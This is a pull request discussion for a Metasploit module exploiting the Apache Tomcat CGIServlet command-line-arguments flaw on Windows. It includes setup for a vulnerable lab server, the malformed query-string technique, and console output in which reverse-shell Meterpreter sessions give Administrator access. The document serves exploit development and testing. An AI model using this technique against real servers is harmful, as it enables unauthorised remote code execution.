Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
rapid7/metasploit-framework pull request #11990
Opened 2019-06-18 20:40 UTC by wchen-r7

## Description

This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.

## Setup

Prepare a Windows box with JDK8 on it. You also want to make sure the box has the JAVA_HOME environment variable configured. For example:

```
JAVA_HOME=C:\Program Files\Java\jdk1.8.0_211
```

To help you speed up the process, I have uploaded the actual vulnerable tomcat setup that you can use:
[apache-tomcat-9.0.17.zip](https://github.com/rapid7/metasploit-framework/files/3303314/apache-tomcat-9.0.17.zip)

To use it, simply download and extract it on the Windows machine. Go to the bin directory and execute the startup.bat file.

Note that I also created a debugging port for this tomcat on 4000, so if you want, you can attach IntelliJ and observe the tomcat internals more for analysis reasons.

The cgi script should be located at: http://IP:8080/cgi/test.bat

## Verification

- [ ] Start msfconsole
- [ ] Use windows/http/tomcat_cgi_cmdlineargs
- [ ] Set RHOSTS
- [ ] Start TARGETURI (if you're using the tomcat I uploaded, it should be /cgi/test.bat)
- [ ] Set a payload
- [ ] Run the module, you should get a session.

## Demo:

```
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 172.16.135.141:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Checking if 172.16.135.141 is vulnerable
[*] 172.16.135.141 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 172.16.135.141
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.141:52004) at 2019-06-18 15:39:42 -0500
[*] Command Stager progress - 100.02% done (100692/100668 bytes)

meterpreter > 
[!] Make sure to manually cleanup the exe enerated by the exploit
```

2019-06-18 20:48 UTC, timwr commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    print_warning('Make sure to manually cleanup the exe enerated by the exploit')
enerated -> generated :trollface:

2019-06-18 20:48 UTC, wchen-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    print_warning('Make sure to manually cleanup the exe enerated by the exploit')
ahh dang it. I make a lot of typos.

2019-06-19 01:18 UTC, h00die commented on documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
> +
can you add a h4 with what version of tomcat, what version of java, and what version of windows this was on

2019-06-19 01:20 UTC, h00die commented
I wouldn't mind taking this one,if you had someone else in mind or it was a priority feel free to replace me.
My Windows 2012 VM is missing a vmdk, so I'll have to rebuild it.  Should have this done over the weekend if not sooner!

2019-06-19 02:31 UTC, wchen-r7 commented on documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
> +
ah yeah, sure.

2019-06-19 02:35 UTC, wchen-r7 commented
Not a priority. Please take your time. Thanks!

2019-06-19 19:22 UTC, jrobles-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&#{CGI.escape(cmd)}"
Use `vars_get` in the request.

2019-06-19 19:22 UTC, jrobles-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&echo+#{sig}"
Use `vars_get` in the request.

2019-06-19 20:07 UTC, wchen-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&#{CGI.escape(cmd)}"
It's not really a standard request so.... are you sure?

2019-06-19 20:16 UTC, jrobles-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&#{CGI.escape(cmd)}"
If it doesn't work, then feel free to mark this as resolved 🤷‍♂

2019-06-19 20:39 UTC, wchen-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&#{CGI.escape(cmd)}"
haha no prob, let me try :-)

2019-06-19 21:11 UTC, wchen-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&#{CGI.escape(cmd)}"
Yeah this isn't gonna work because this:

```
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri,
      'vars_get' =>
        {
          '' => sig
        }
    })
```

Translates to this:

```
GET /cgi/test.bat?=wQYsLTeXjQ HTTP/1.1
Host: 172.16.135.139:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
```

But the request I want it this:

```
GET /cgi/test.bat?&echo+wQYsLTeXjQ
```

The extra `=` won't work for me, so wouldn't make sense to use `vars_get`. I tried.

2019-06-19 21:12 UTC, wchen-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&echo+#{sig}"
`vars_get` doesn't craft the type of malformed request I need, so I can't use it.

2019-06-19 21:57 UTC, wchen-r7 commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    uri << "?&#{CGI.escape(cmd)}"
I should also point out that `=` is an undesired character because in Tomcat's CGIServelet code, it specifically looks for that before putting the query as command parameters:

```java
                if (qs != null && qs.indexOf('=') == -1) {
                    StringTokenizer qsTokens = new StringTokenizer(qs, "+");
                    while ( qsTokens.hasMoreTokens() ) {
                        cmdLineParameters.add(URLDecoder.decode(qsTokens.nextToken(),
                                              parameterEncoding));
                    }
                }
```

So definitely no.

2019-06-21 01:34 UTC, h00die commented on documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
> +Also, the machine needs to enable the enableCmdLineArguments option in web.xml. For example:
`web.xml`

2019-06-24 16:27 UTC, h00die commented
https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/ mentions:
```
3. Modify the conf\context.xml file on line 19, to enable privileged context:

<Context privileged="true">
```

Your bundle also includes that change.  I attempted exploit against my own custom install and its failing (most likely a typo or user error on my behalf), but that instruction wasn't in the docs, but is required right?

2019-06-24 18:05 UTC, wchen-r7 commented
Yes I have that set to true.

2019-06-25 00:22 UTC, h00die commented
Your bundle worked, still trying to figure out why my manual didn't (so the docs can be adjusted if need be)
```
```

2019-06-25 00:47 UTC, h00die commented
worked on 8.5.20 as well on my server 2012 box.
```
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2019-06-24 20:44:19 -0400  %SystemDrive%
100777/rwxrwxrwx  73802  fil   2019-06-24 20:44:19 -0400  dKASF.exe
100777/rwxrwxrwx  67     fil   2019-06-20 21:52:49 -0400  example.bat
100777/rwxrwxrwx  69     fil   2019-06-24 15:15:13 -0400  test.bat

meterpreter > sysinfo
Computer        : WIN-EDKFSE5QPAB
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH:       "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built:   Aug 2 2017 21:35:49 UTC
Server number:  8.5.20.0
OS Name:        Windows Server 2012
OS Version:     6.2
Architecture:   amd64
JVM Version:    1.8.0_211-b12
JVM Vendor:     Oracle Corporation

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>

```

2019-06-25 01:12 UTC, h00die requested changes
exploit working, some minor doc cleanups

2019-06-25 01:12 UTC, h00die commented on modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
> +    if check == CheckCode::Vulnerable
on the linux local side, @bcoles has been doing a really nice `ForceExploit` to bypass this check.  Consider it some future proofing and odd ball handling.
https://github.com/rapid7/metasploit-framework/pull/11808/files#diff-a2f7f27f2b531292e7053780cf5b8d56R77

2019-06-25 14:01 UTC, wchen-r7 commented
Ok. Awesome. I'll make the changes today. Thanks for testing!

2019-06-28 19:52 UTC, wchen-r7 commented
Hi @h00die, how's it going? Any more feedback?

2019-06-29 00:41 UTC, h00die commented
There's a few minor doc things, but honestly it'll take me less time to change it when landing.  Should be able to wrap this up over the weekend!

2019-07-01 21:31 UTC, merged

2019-07-01 21:41 UTC, h00die commented
# Release Notes
This PR adds an exploit for Apache Tomcat on Windows when the cmdlineargs is configured (non-default)